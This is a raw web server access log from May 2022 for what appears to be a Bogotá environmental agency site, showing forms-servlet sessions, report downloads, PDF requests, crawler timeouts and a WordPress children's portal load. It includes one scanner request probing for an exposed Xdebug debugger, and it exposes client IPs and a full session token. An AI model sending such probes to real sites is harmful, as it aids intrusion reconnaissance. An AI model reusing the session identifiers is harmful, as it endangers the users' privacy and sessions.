200.118.64.109 - - [18/May/2022:19:56:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
172.22.2.4 - - [18/May/2022:19:55:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [18/May/2022:19:55:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
200.118.64.109 - - [18/May/2022:19:56:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:56:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 109
200.118.64.109 - - [18/May/2022:19:56:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:56:56 -0500] "GET /reports/rwservlet/getjobid76201?server=repnomi HTTP/1.1" 200 300918
216.245.221.92 - - [18/May/2022:19:57:25 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [18/May/2022:19:57:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:57:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:57:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2325
200.118.64.109 - - [18/May/2022:19:57:38 -0500] "GET /imagenes/Srch_frw.gif HTTP/1.1" 200 925
200.118.64.109 - - [18/May/2022:19:57:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 10
200.118.64.109 - - [18/May/2022:19:57:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 26
200.118.64.109 - - [18/May/2022:19:57:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:57:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 3817
200.118.64.109 - - [18/May/2022:19:57:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:57:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:57:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:57:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:57:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:57:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:57:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 108
200.118.64.109 - - [18/May/2022:19:57:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:57:52 -0500] "GET /reports/rwservlet/getjobid76202?server=repnomi HTTP/1.1" 200 47879
157.55.39.8 - - [18/May/2022:19:58:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201401-1450/00001431.tif HTTP/1.1" 200 294380
200.118.64.109 - - [18/May/2022:19:58:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:58:58 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:58:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:59:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 112
200.118.64.109 - - [18/May/2022:19:59:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:59:00 -0500] "GET /reports/rwservlet/getjobid76203?server=repnomi HTTP/1.1" 200 47883
173.252.87.118 - - [18/May/2022:19:59:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3918.pdf HTTP/1.1" 206 258617
200.118.64.109 - - [18/May/2022:19:59:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:59:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:59:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:59:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:19:59:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 109
200.118.64.109 - - [18/May/2022:19:59:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:19:59:46 -0500] "GET /reports/rwservlet/getjobid76204?server=repnomi HTTP/1.1" 200 474170
95.108.213.61 - - [18/May/2022:20:00:05 -0500] "-" 408 -
5.45.207.96 - - [18/May/2022:20:00:10 -0500] "-" 408 -
87.250.224.198 - - [18/May/2022:20:00:16 -0500] "-" 408 -
87.250.224.78 - - [18/May/2022:20:00:21 -0500] "-" 408 -
200.118.64.109 - - [18/May/2022:20:00:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:00:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2208
200.118.64.109 - - [18/May/2022:20:00:29 -0500] "GET /imagenes/Srch_frw.gif HTTP/1.1" 200 925
200.118.64.109 - - [18/May/2022:20:00:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 10
200.118.64.109 - - [18/May/2022:20:00:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 26
200.118.64.109 - - [18/May/2022:20:00:32 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:00:33 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 3859
200.118.64.109 - - [18/May/2022:20:00:33 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/May/2022:19:58:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
141.8.142.65 - - [18/May/2022:20:00:37 -0500] "-" 408 -
200.118.64.109 - - [18/May/2022:20:00:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:00:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:00:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:00:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:00:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:00:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [18/May/2022:20:00:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 108
200.118.64.109 - - [18/May/2022:20:00:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:00:46 -0500] "GET /reports/rwservlet/getjobid76205?server=repnomi HTTP/1.1" 200 47765
87.250.224.48 - - [18/May/2022:20:00:51 -0500] "-" 408 -
87.250.224.117 - - [18/May/2022:20:01:21 -0500] "-" 408 -
172.22.2.4 - - [18/May/2022:19:59:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
200.118.64.109 - - [18/May/2022:20:01:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:01:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:01:33 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:01:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 112
200.118.64.109 - - [18/May/2022:20:01:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:01:34 -0500] "GET /reports/rwservlet/getjobid76206?server=repnomi HTTP/1.1" 200 47868
200.118.64.109 - - [18/May/2022:20:01:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
5.255.253.149 - - [18/May/2022:20:02:21 -0500] "-" 408 -
216.245.221.92 - - [18/May/2022:20:02:25 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [18/May/2022:20:02:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:02:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:02:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/May/2022:20:02:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 109
200.118.64.109 - - [18/May/2022:20:02:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/May/2022:20:02:45 -0500] "GET /reports/rwservlet/getjobid76207?server=repnomi HTTP/1.1" 200 192773
5.45.207.72 - - [18/May/2022:20:03:21 -0500] "-" 408 -
200.118.64.109 - - [18/May/2022:20:03:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 95
200.118.64.109 - - [18/May/2022:20:03:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64d0fe7a7c6994a1e82edec92df1f9d00.e3iSbxaKaheRe34KbxqPchuLbi1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 -
199.16.157.182 - - [18/May/2022:20:04:38 -0500] "GET /images/imagen-comunicado-podcast.jpg HTTP/1.1" 200 39765
87.250.224.60 - - [18/May/2022:20:05:21 -0500] "-" 408 -
172.22.2.4 - - [18/May/2022:20:04:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:05:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [18/May/2022:20:07:25 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.166 - - [18/May/2022:20:08:21 -0500] "-" 408 -
172.22.2.4 - - [18/May/2022:20:10:36 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/May/2022:20:10:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/May/2022:20:12:25 -0500] "HEAD / HTTP/1.1" 200 -
186.146.52.213 - - [18/May/2022:20:12:31 -0500] "GET /si-te-gusta-la-pintura-el-dibujo-o-la-fotografia-el-concurso-a-vuelo-de-pajaro-es-para-ti.html HTTP/1.1" 200 861
172.22.2.4 - - [18/May/2022:20:11:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
69.171.231.3 - - [18/May/2022:20:14:35 -0500] "GET /bogota-ya-cuenta-mas-de-70-negocios-verdes-verificados.html HTTP/1.1" 206 992
193.106.191.48 - - [18/May/2022:20:16:33 -0500] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 319
181.62.149.79 - - [18/May/2022:20:17:08 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.62.149.79 - - [18/May/2022:20:17:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2012%2F HTTP/1.1" 200 140066
181.62.149.79 - - [18/May/2022:20:17:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0288.pdf HTTP/1.1" 200 418763
216.245.221.92 - - [18/May/2022:20:17:25 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.15 - - [18/May/2022:20:17:44 -0500] "GET /images/reciclaton-mayo-3-mayo.jpg HTTP/1.1" 200 278453
200.10.154.81 - - [18/May/2022:20:17:51 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
200.10.154.81 - - [18/May/2022:20:17:53 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
200.10.154.81 - - [18/May/2022:20:17:53 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
200.10.154.81 - - [18/May/2022:20:17:53 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
200.10.154.81 - - [18/May/2022:20:17:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
200.10.154.81 - - [18/May/2022:20:17:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
200.10.154.81 - - [18/May/2022:20:17:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
200.10.154.81 - - [18/May/2022:20:17:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
200.10.154.81 - - [18/May/2022:20:17:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
200.10.154.81 - - [18/May/2022:20:17:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
200.10.154.81 - - [18/May/2022:20:17:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
200.10.154.81 - - [18/May/2022:20:17:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
200.10.154.81 - - [18/May/2022:20:17:56 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
200.10.154.81 - - [18/May/2022:20:17:56 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
200.10.154.81 - - [18/May/2022:20:17:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
186.155.64.47 - - [18/May/2022:20:17:57 -0500] "GET /secretaria-de-ambiente-realizo-jornada-de-sensibilizacion-para-el-cuidado-de-las-aves.html?fbclid=IwAR1iIVhqheaqAum9nM6076aoY8456aaDl36yOnO25Mkj3zHKWklFBLSglt8 HTTP/1.1" 200 820
200.10.154.81 - - [18/May/2022:20:17:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
200.10.154.81 - - [18/May/2022:20:17:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
200.10.154.81 - - [18/May/2022:20:17:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
200.10.154.81 - - [18/May/2022:20:17:58 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
200.10.154.81 - - [18/May/2022:20:17:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
200.10.154.81 - - [18/May/2022:20:17:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
200.10.154.81 - - [18/May/2022:20:17:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
200.10.154.81 - - [18/May/2022:20:17:59 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
200.10.154.81 - - [18/May/2022:20:18:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
200.10.154.81 - - [18/May/2022:20:18:01 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
200.10.154.81 - - [18/May/2022:20:18:01 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
200.10.154.81 - - [18/May/2022:20:18:01 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
200.10.154.81 - - [18/May/2022:20:18:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
200.10.154.81 - - [18/May/2022:20:18:02 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
200.10.154.81 - - [18/May/2022:20:18:02 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 200 11944
200.10.154.81 - - [18/May/2022:20:18:02 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
173.252.83.120 - - [18/May/2022:20:18:02 -0500] "GET /images/reciclaton-mayo-3-mayo.jpg HTTP/1.1" 200 278453
200.10.154.81 - - [18/May/2022:20:18:02 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/tigrillo.jpg HTTP/1.1" 200 402961
200.10.154.81 - - [18/May/2022:20:18:02 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
200.10.154.81 - - [18/May/2022:20:18:03 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
172.22.2.4 - - [18/May/2022:20:16:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.10.154.81 - - [18/May/2022:20:18:04 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-videos-ni%C3%B1os.png HTTP/1.1" 200 10502
200.10.154.81 - - [18/May/2022:20:18:03 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/caneca.jpg HTTP/1.1" 200 262661
200.10.154.81 - - [18/May/2022:20:18:04 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-humedales-ni%C3%B1os.png HTTP/1.1" 200 13361
200.10.154.81 - - [18/May/2022:20:18:05 -0500] "GET /portaldeninos/wp-content/uploads/2022/03/humedal-capellania.jpg HTTP/1.1" 200 42159
200.10.154.81 - - [18/May/2022:20:18:06 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
200.10.154.81 - - [18/May/2022:20:18:06 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/yt.jpg HTTP/1.1" 200 10577
200.10.154.81 - - [18/May/2022:20:18:06 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/ig.jpg HTTP/1.1" 200 11470
200.10.154.81 - - [18/May/2022:20:18:06 -0500] "GET /portaldeninos/wp-content/uploads/2022/03/Mapa-humedales-2022.jpg HTTP/1.1" 200 894674
200.10.154.81 - - [18/May/2022:20:18:07 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/tw.jpg HTTP/1.1" 200 11056
200.10.154.81 - - [18/May/2022:20:18:08 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
200.10.154.81 - - [18/May/2022:20:18:08 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
200.10.154.81 - - [18/May/2022:20:18:08 -0500] "GET /portaldeninos/wp-json/pum/v1/analytics/?event=open&pid=1126&_cache=1652922914148 HTTP/1.1" 204 -
